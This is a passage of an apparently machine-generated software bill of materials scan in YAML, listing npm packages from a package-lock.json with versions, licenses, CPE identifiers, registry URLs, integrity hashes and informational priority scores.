- cpe: cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/run-parallel@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz
integrity: sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==
dependencies:
queue-microtask: ^1.2.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0d59c1e836c63d4a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: safe-buffer 5.1.2'
title: safe-buffer 5.1.2
description: 'Package discovered: safe-buffer 5.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 36d9a8484ed180a6
name: safe-buffer
version: 5.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/safe-buffer@5.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz
integrity: sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 982541a2a19fdc52
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: safe-buffer 5.2.1'
title: safe-buffer 5.2.1
description: 'Package discovered: safe-buffer 5.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 28135efb01cb74b9
name: safe-buffer
version: 5.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/safe-buffer@5.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz
integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 186ed2340219a99c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: safer-buffer 2.1.2'
title: safer-buffer 2.1.2
description: 'Package discovered: safer-buffer 2.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bc8acb243e9d9464
name: safer-buffer
version: 2.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/safer-buffer@2.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz
integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2ab87631c01bfc3f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: scheduler 0.17.0'
title: scheduler 0.17.0
description: 'Package discovered: scheduler 0.17.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e689757d7bf8470d
name: scheduler
version: 0.17.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/scheduler@0.17.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz
integrity: sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA==
dependencies:
loose-envify: ^1.1.0
object-assign: ^4.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bbbd7dd6a8a5a506
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: scheduler 0.23.2'
title: scheduler 0.23.2
description: 'Package discovered: scheduler 0.23.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d0ebbd8a4bc7ada1
name: scheduler
version: 0.23.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/scheduler@0.23.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz
integrity: sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==
dependencies:
loose-envify: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 613adae5df8a79db
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: scmp 2.1.0'
title: scmp 2.1.0
description: 'Package discovered: scmp 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 607830ce210254e3
name: scmp
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/scmp@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz
integrity: sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 186e8c930a60e0f6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: selderee 0.11.0'
title: selderee 0.11.0
description: 'Package discovered: selderee 0.11.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a6fb1c756dcd04fc
name: selderee
version: 0.11.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/selderee@0.11.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz
integrity: sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA==
dependencies:
parseley: ^0.12.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 809205930987a974
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: semver 7.7.4'
title: semver 7.7.4
description: 'Package discovered: semver 7.7.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: dc47801cc9b2ec78
name: semver
version: 7.7.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/semver@7.7.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/semver/-/semver-7.7.4.tgz
integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 67469cce48d87167
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: send 0.19.2'
title: send 0.19.2
description: 'Package discovered: send 0.19.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1d81dd407a94f88a
name: send
version: 0.19.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/send@0.19.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/send/-/send-0.19.2.tgz
integrity: sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg==
dependencies:
debug: 2.6.9
depd: 2.0.0
destroy: 1.2.0
encodeurl: ~2.0.0
escape-html: ~1.0.3
etag: ~1.8.1
fresh: ~0.5.2
http-errors: ~2.0.1
mime: 1.6.0
ms: 2.1.3
on-finished: ~2.4.1
range-parser: ~1.2.1
statuses: ~2.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3a3b9a5d9af10f0c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: serve-static 1.16.3'
title: serve-static 1.16.3
description: 'Package discovered: serve-static 1.16.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0a7cfe5561f2b18b
name: serve-static
version: 1.16.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/serve-static@1.16.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz
integrity: sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA==
dependencies:
encodeurl: ~2.0.0
escape-html: ~1.0.3
parseurl: ~1.3.3
send: ~0.19.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aaaf7e5ff977361c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: set-blocking 2.0.0'
title: set-blocking 2.0.0
description: 'Package discovered: set-blocking 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: afe02a75a981b13d
name: set-blocking
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/set-blocking@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz
integrity: sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 506518f9c8ac4766
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: setprototypeof 1.2.0'
title: setprototypeof 1.2.0
description: 'Package discovered: setprototypeof 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fc983ad918ad063a
name: setprototypeof
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/setprototypeof@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz
integrity: sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fdeea92c74bf39fa
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: sharp 0.34.5'
title: sharp 0.34.5
description: 'Package discovered: sharp 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f96d5af8de184f83
name: sharp
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/sharp@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz
integrity: sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==
dependencies:
'@img/colour': ^1.0.0
detect-libc: ^2.1.2
semver: ^7.7.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a0d820679cbb3cb7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: shebang-command 2.0.0'
title: shebang-command 2.0.0
description: 'Package discovered: shebang-command 2.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 14d8b5cbe6162ddd
name: shebang-command
version: 2.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/shebang-command@2.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz
integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==
dependencies:
shebang-regex: ^3.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f5b7b8efb70e19a9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: shebang-regex 3.0.0'
title: shebang-regex 3.0.0
description: 'Package discovered: shebang-regex 3.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b86e26fe1fc6c7c9
name: shebang-regex
version: 3.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/shebang-regex@3.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz
integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6b555e361c3642d5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: side-channel 1.1.0'
title: side-channel 1.1.0
description: 'Package discovered: side-channel 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a236188908f1e843
name: side-channel
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/side-channel@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz
